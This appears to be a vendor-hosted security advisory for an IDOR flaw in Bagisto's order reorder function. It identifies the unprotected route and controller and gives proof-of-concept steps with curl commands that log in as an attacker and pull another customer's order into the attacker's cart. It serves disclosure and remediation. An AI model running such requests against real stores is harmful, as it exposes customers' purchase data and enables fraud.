Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

GHSA-x5rw-qvvp-5cgm

Bagisto has IDOR in Customer Order Reorder Functionality
Back to all
CVE

GHSA-x5rw-qvvp-5cgm

Bagisto has IDOR in Customer Order Reorder Functionality

Summary

An Insecure Direct Object Reference vulnerability in the customer order reorder function allows any authenticated customer to add items from another customer's order to their own shopping cart by manipulating the order ID parameter. This exposes sensitive purchase information and enables potential fraud.

Details

The vulnerability exists in the reorder method within OrderController.php. Unlike other order-related functions like view, cancel, printInvoice that properly validate customer ownership, the reorder function retrieves orders using only the order ID without verifying that the order belongs to the authenticated customer.

Code location: packages/Webkul/Shop/src/Http/Controllers/Customer/Account/OrderController.php

Exposed Route: packages/Webkul/Shop/src/Routes/customer-routes.php

Route::get('reorder/{id}', 'reorder')->name('shop.customers.account.orders.reorder');

PoC

I. Create victim account and place an order.

II. Login as attacker.

III. Exploit IDOR and navigate like:  http://target.xxx/customer/account/orders/reorder/1

IV. Check http://target.xxx/checkout/cart and verify exploitation.

V. Victim's order items are now in Attacker's cart.

### PoC via curl:

curl -c cookies.txt -X POST "http://target.xxx/customer/login" -d "email=attacker@evil.com&password=123qwe"
curl -b cookies.txt "http://target.xxx/customer/account/orders/reorder/1"
curl -b cookies.txt "http://target/api/checkout/cart"

Impact

  • Information Disclosure: Attackers can discover what products other customers have purchased.
  • Potential Fraud: Attackers could potentially exploit this for social engineering or targeted attacks.

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
-
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
C
H
U
-

Related Resources

No items found.

References

https://github.com/bagisto/bagisto/security/advisories/GHSA-x5rw-qvvp-5cgm, https://nvd.nist.gov/vuln/detail/CVE-2026-21447, https://github.com/bagisto/bagisto/commit/b2b1cf62577245d03a68532478cffbe321df74d3, https://github.com/bagisto/bagisto

Severity

7.1

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
7.1
EPSS Probability
0%
EPSS Percentile
0%
Introduced Version
0
Fix Available
2.3.10

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading